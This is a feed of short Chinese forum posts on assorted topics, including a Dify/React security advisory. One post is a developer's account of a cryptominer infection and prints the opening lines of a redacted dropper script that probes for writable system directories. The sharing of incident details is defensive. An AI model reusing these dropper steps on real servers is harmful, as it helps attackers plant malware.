[生活] 谁说国内没有罢工,罢工争取加班权,反对 5 天 8 小时,倒反天罡😂
·
深圳易力声 3000 人大罢工
·
深圳易力声 3000 人大罢工
·
平时做 A 股会有一个很普遍的痛点: 行情软件很多,但要做一套有章可循的盘后复盘 + 个股深度分析,往往需要在同花顺 / 东方财富 / 券商 APP / 各种网页之间来回切。数据是有的,但缺乏一套统一的投资理念与工作流,效率很低。 我这边做的这个桌面应用,是一款专门面向 A 股中长期投资者的专业投资分析生产力工具,定位很明确: 不做交易终端,只做盘后复盘、热点追踪和深度分析。 以「价值为基、趋势为策、风控优先」为核心理念。 核心功能: 盘后复盘看板:市场总览、资金流向、行业资金、市场主线,一屏掌握市场全貌 热点发现:行业/概念热力图,多维度指标可视化,盘后结构梳理 智能筛选器:个股/ETF 多维度筛选,围绕「安全边际 + 趋势共振 + 组合稳健」设计 个股深度分析:安全边际评估、趋势共振分析、财务画像、股东研究、十年业绩等全方位分析 产品定位: 不是同花顺/东方财富的平替 —— 不做实时交易,只聚焦盘后复盘与深度研究 不是雪球那类社区 —— 没有信息流和情绪干扰,只提供数据和分析 不是量化平台 —— 不需要写代码,面向希望「提高分析效率」的中长期投资者 目标用户: 有自己的一套价值/趋势框架,希望标准化复盘流程 以 1–3 个月波段 + 1–5 年价值投资 为主 更在乎安全边际、企业质量、组合稳健 限时活动:1 个月免费体验版 完整功能可用,无需绑定支付方式 体验期结束不自动扣费 欢迎愿意认真使用并反馈的朋友来试用 了解更多: 产品介绍和使用指南:…
·
早上收到阿里云短信,说有一台服务器被用来挖矿,排查发现哥们用漏洞来注入用于挖门罗币。 做开发 12 年了第一次遇到服务器被人搞,说实话还有点刺激还有点兴奋。 复盘一下经过,大家共赏: 1 、收到阿里云报警说有服务器用于挖矿 2 、阿里云后台定位到了大致的挖矿文件 3 、上服务器一看 好家伙确实多了不少东西,有两个核心的攻击脚本,一个是 python1.sh ,一个是 sex.sh ,直接脱敏后放出脚本大家共赏: python1.sh #!/bin/bash # ========== 脱敏说明 ========== # 1. 攻击者 IP/端口替换为[攻击者 C2 服务器 IP:端口] # 2. 恶意程序随机文件名替换为[恶意程序随机文件名] # 3. 下载/执行类恶意逻辑添加注释,仅保留结构 # 4. 核心攻击特征已标注,无任何可执行的恶意代码 export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin mkdir -p /tmp cd /tmp touch /usr/local/bin/writeablex >/dev/null 2>&1 && cd /usr/local/bin/ touch /usr/libexec/writeablex >/dev/null…
·
从北京边检总站获悉,12月6日0时08分,北京口岸出入境人员总量突破2000万人次,是去年全年总量的1.1倍,同比增长18%。(央视新闻)
·
Memory:2048 MB CPU:2 Core(s) Storage:22 GB Traffic:750 GB 年付 22 刀。带 OUTLOOK 原邮 剩余价值 136 元,130 出。位置日本 看得上的 TG 联系,可闲鱼。TG:plmojb
·
一个拥有最高权限的 AI ,完全可以帮助用户屏蔽硬广软广、分析真实评价、多平台比价、自动薅羊毛… 以前需要一个机器人+虚拟机+ip 池等复杂配置才能完成的工作现在能轻松运行在每一个用户的手机上。 虽然大厂已经开始屏蔽,但你一个应用还能干过系统不成。 最大的问题是隐私保护,用户基本上对豆包裸奔了。
·
PixelHub.art 现已支持 帧动画! 95% 概率为 透明背景 或 纯色背景,方便二次创作。 若对生成效果不满意,可直接下载源文件,用 Aseprite 或 Photoshop 继续编辑。 欢迎大家体验支持!
·
早上评论基本都是攻击某粗粮公司的,结果中午来了个小反转,是偷税漏税。。。 如果猜测是粗粮。这逻辑上其实行不通吧,粗粮和陈震所有人都知道关系不好,但网上和粗粮关系不好的大 V 多着呢,而且这次是全网封禁,粗粮有这个能力吗?为什么那么多人还认为是粗粮? V 站用户不多,做营销也几乎没必要投钱来这里吧?所以大家应该是自发评论的吧? 就挺奇怪的点。V 站按理来说,学历不会太低吧。感觉和抖音快手差不多啊
·
看现在站里面隔三差五就有求推荐车的帖子,明显比疫情前多了。为什么汽车行业的打工仔没有像之前房地产行业和互联网行业一样高薪挣大钱?
·
漏洞通告: https://cloud.tencent.com/announce/detail/2179 受 CVE-2025-55182 漏洞影响,在对应版本的 React 或者 Next.js 使用了 React Server Components 的均存在漏洞。 Dify 项目使用了对应版本的前端框架,可直接获取系统权限,目前网上已有黑产团队批量攻击公网 Dify ,建议升级到最新版。 升级包: https://github.com/langgenius/dify/releases/tag/1.10.1-fix.1